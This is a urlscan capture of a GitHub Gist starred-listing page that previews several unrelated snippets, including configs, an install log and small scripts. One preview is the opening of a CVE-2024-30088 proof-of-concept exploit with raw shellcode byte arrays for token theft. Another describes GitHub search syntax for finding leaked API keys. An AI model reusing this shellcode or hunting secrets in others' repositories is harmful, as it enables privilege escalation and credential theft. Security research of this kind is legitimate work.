gist.github.com Open in urlscan Pro
140.82.121.4  Public Scan

Submitted URL: https://kurt.hjfkinte.forumu.tc/
Effective URL: https://gist.github.com/starred
Submission: On July 01 via api from US — Scanned from DE

Form analysis 1 forms found in the DOM

GET /search

<form class="position-relative js-quicksearch-form" role="search" aria-label="Site" data-turbo="false" action="/search" accept-charset="UTF-8" method="get">
  <div class="header-search-wrapper form-control input-sm js-chromeless-input-container">
    <input type="text" class="form-control input-sm js-site-search-focus header-search-input" data-hotkey="s,/" name="q" aria-label="Search" placeholder="Search…" autocorrect="off" autocomplete="off" autocapitalize="off">
  </div>
</form>

Text Content

Skip to content

All gists Back to GitHub Sign in Sign up

Sign in Sign up
You signed in with another tab or window. Reload to refresh your session. You
signed out in another tab or window. Reload to refresh your session. You
switched accounts on another tab or window. Reload to refresh your session.
Dismiss alert

{{ message }}

Instantly share code, notes, and snippets.


DISCOVER GISTS

 * 

 * All gists
 * Forked
 * Starred

 * 1 file
 * 0 forks
 * 0 comments
 * 5 stars

yugaego / PHP APCu Config
Created May 18, 2016 11:05
This file contains bidirectional Unicode text that may be interpreted or
compiled differently than what appears below. To review, open the file in an
editor that reveals hidden Unicode characters. Learn more about bidirectional
Unicode characters
Show hidden characters

; Enable APCu extension module extension = apcu.so ; This can be set to 0 to
disable APCu apc.enabled=1 ; Setting this enables APCu for the CLI version of
PHP ; (Mostly for testing and debugging). ;apc.enable_cli=0

 * 1 file
 * 0 forks
 * 1 comment
 * 6 stars

carrot-c4k3 / CVE-2024-30088-PoC.txt
Created June 28, 2024 03:36
CVE-2024-30088 PoC
This file contains bidirectional Unicode text that may be interpreted or
compiled differently than what appears below. To review, open the file in an
editor that reveals hidden Unicode characters. Learn more about bidirectional
Unicode characters
Show hidden characters

// // CVE-2024-30088 PoC - @carrot_c4k3 (exploits.forsale) // let
get_token_handle_code =
[0x48,0x89,0x4c,0x24,0x8,0x48,0x83,0xec,0x48,0x48,0xc7,0x44,0x24,0x38,0x0,0x0,0x0,0x0,0x48,0x8b,0x44,0x24,0x50,0xff,0x10,0x4c,0x8d,0x44,0x24,0x38,0xba,0x0,0x0,0x0,0x2,0x48,0x8b,0xc8,0x48,0x8b,0x44,0x24,0x50,0xff,0x50,0x8,0xc7,0x44,0x24,0x30,0x0,0x0,0x0,0x0,0x48,0x8d,0x44,0x24,0x30,0x48,0x89,0x44,0x24,0x20,0x41,0xb9,0x0,0x20,0x0,0x0,0x48,0x8b,0x44,0x24,0x50,0x4c,0x8b,0x40,0x18,0xba,0x16,0x0,0x0,0x0,0x48,0x8b,0x4c,0x24,0x38,0x48,0x8b,0x44,0x24,0x50,0xff,0x50,0x10,0x48,0x8b,0x44,0x24,0x50,0x48,0x8b,0x4c,0x24,0x38,0x48,0x89,0x48,0x40,0x8b,0x44,0x24,0x30,0x48,0x83,0xc4,0x48,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc]
let create_smash_thread_code =
[0x48,0x89,0x4c,0x24,0x8,0x48,0x83,0xec,0x38,0x48,0xc7,0x44,0x24,0x28,0x0,0x0,0x0,0x0,0xc7,0x44,0x24,0x20,0x0,0x0,0x0,0x0,0x4c,0x8b,0x4c,0x24,0x40,0x48,0x8b,0x44,0x24,0x40,0x4c,0x8b,0x40,0x28,0x33,0xd2,0x33,0xc9,0x48,0x8b,0x44,0x24,0x40,0xff,0x50,0x20,0x48,0x83,0xc4,0x38,0xc3,0xcc

 * 1 file
 * 69 forks
 * 13 comments
 * 223 stars

win3zz / GitHub-Leaked-API-Keys-and-Secrets.md
Last active July 1, 2024 04:54


GITHUB SEARCH SYNTAX FOR FINDING API KEYS/SECRETS/TOKENS

As a security professional, it is important to conduct a thorough
reconnaissance. With the increasing use of APIs nowadays, it has become
paramount to keep access tokens and other API-related secrets secure in order to
prevent leaks. However, despite technological advances, human error remains a
factor, and many developers still unknowingly hardcode their API secrets into
source code and commit them to public repositories. GitHub, being a widely
popular platform for public code repositories, may inadvertently host such
leaked secrets. To help identify these vulnerabilities, I have created a
comprehensive search list using powerful search syntax that enables the search
of thousands of leaked keys and secrets in a single search.


SEARCH SYNTAX:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR
{Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND
({PlatformTag1} OR {PlatformTag-N}))


EXAMPLES:

**1.

 * 2 files
 * 0 forks
 * 0 comments
 * 1 star

jsongerber / .zshrc
Last active July 1, 2024 04:52
Easily open an SSH connection using Neovim using ssh config and oil.nvim
This file contains bidirectional Unicode text that may be interpreted or
compiled differently than what appears below. To review, open the file in an
editor that reveals hidden Unicode characters. Learn more about bidirectional
Unicode characters
Show hidden characters

# your config… alias oil='~/.local/bin/oil-ssh.sh' # your config…

 * 1 file
 * 0 forks
 * 0 comments
 * 3 stars

tuklusan / PDP-10_TOPS-20_TWENEX_INSTALL.LOG
Last active July 1, 2024 04:47
Complete session log of installing and configuring Panda TOPS-20 distribution,
including DECnet Phase IV, on KLH10 PDP-10. Details:
https://supratim-sanyal.blogspot.com/2019/03/visiting-fountain-of-computing-folklore.html
This file contains bidirectional Unicode text that may be interpreted or
compiled differently than what appears below. To review, open the file in an
editor that reveals hidden Unicode characters. Learn more about bidirectional
Unicode characters
Show hidden characters

Complete session log of installing and configuring Panda TOPS-20 distribution,
including DECnet Phase IV, on KLH10 PDP-10. Details:
https://supratim-sanyal.blogspot.com/2019/03/visiting-fountain-of-computing-folklore.html
localuser@opensuse:~/PDP-10.TOPS-20/KLH10> ls -l panda-dist.tar.gz -rw-r--r-- 1
localuser users 221145391 Jun 24 2006 panda-dist.tar.gz
localuser@opensuse:~/PDP-10.TOPS-20/KLH10>
localuser@opensuse:~/PDP-10.TOPS-20/KLH10> tar xvzf panda-dist.tar.gz
panda-dist/ panda-dist/RH20.RP07.1 panda-dist/README

 * 1 file
 * 151 forks
 * 17 comments
 * 544 stars

idontknowjs / international-companies-hiring-from-india.md
Last active July 1, 2024 04:56

I've recently joined Amazon Dublin from India and got opportunities to interview
with Meta London, Zalando Berlin & some other companies. I extensively
researched about companies hiring internationally which support visa &
relocation for Tech roles. So sharing list of companies:

Do consider to STAR, if it helped you.

London

 * Google
 * Amazon
 * Apple
 * Meta

 * 1 file
 * 0 forks
 * 0 comments
 * 1 star

Shakil-Shahadat / favicon.html
Last active July 1, 2024 04:44
✓ Favicon HTML Code
This file contains bidirectional Unicode text that may be interpreted or
compiled differently than what appears below. To review, open the file in an
editor that reveals hidden Unicode characters. Learn more about bidirectional
Unicode characters
Show hidden characters

<link rel="shortcut icon" href="src/favicon.ico"> <link rel="icon"
href="src/favicon.svg" type="image/svg+xml">

 * 1 file
 * 0 forks
 * 2 comments
 * 3 stars

aluissp / tailwind.config.js
Created February 12, 2023 20:45
Fade in animation in Tailwind CSS
This file contains bidirectional Unicode text that may be interpreted or
compiled differently than what appears below. To review, open the file in an
editor that reveals hidden Unicode characters. Learn more about bidirectional
Unicode characters
Show hidden characters

/** @type {import('tailwindcss').Config} */ module.exports = { content:
['./index.html', './src/**/*.{js,ts,jsx,tsx}'], theme: { extend: { animation: {
fade: 'fadeIn .5s ease-in-out', },

 * 1 file
 * 0 forks
 * 0 comments
 * 1 star

LeftBased / YTChatMessageDeleter.js
Last active July 1, 2024 04:40
delete youtube live chat messages
This file contains bidirectional Unicode text that may be interpreted or
compiled differently than what appears below. To review, open the file in an
editor that reveals hidden Unicode characters. Learn more about bidirectional
Unicode characters
Show hidden characters

function clickButtons() { var buttons = document.querySelectorAll("#yDmH0d >
c-wiz > div > div.jkOv3d > c-wiz > c-wiz > div > div:nth-child(1) >
c-wiz:nth-child(2) > div > div > div.ztN3hd > div.YxbmAc > div > button"); for
(var i = 0; i < buttons.length; i++) { buttons[i].click(); } for (var j = 1; j
<= 10; j++) { var divButtons = document.querySelectorAll("#yDmH0d > c-wiz > div
> div.jkOv3d > c-wiz > c-wiz > div > div:nth-child(" + j + ") > c-wiz > div >
div > div.ztN3hd > div.YxbmAc > div > button"); for (var k = 0; k <
divButtons.length; k++) { setTimeout(function() {

 * 1 file
 * 164 forks
 * 0 comments
 * 544 stars

Windsooon / leetcode_retag.md
Last active July 1, 2024 04:40
Retag most popular Leetcode problems




海外兔



NewerOlder


FOOTER

© 2024 GitHub, Inc.


FOOTER NAVIGATION

 * Terms
 * Privacy
 * Security
 * Status
 * Docs
 * Contact
 * Manage cookies
 * Do not share my personal information

You can’t perform that action at this time.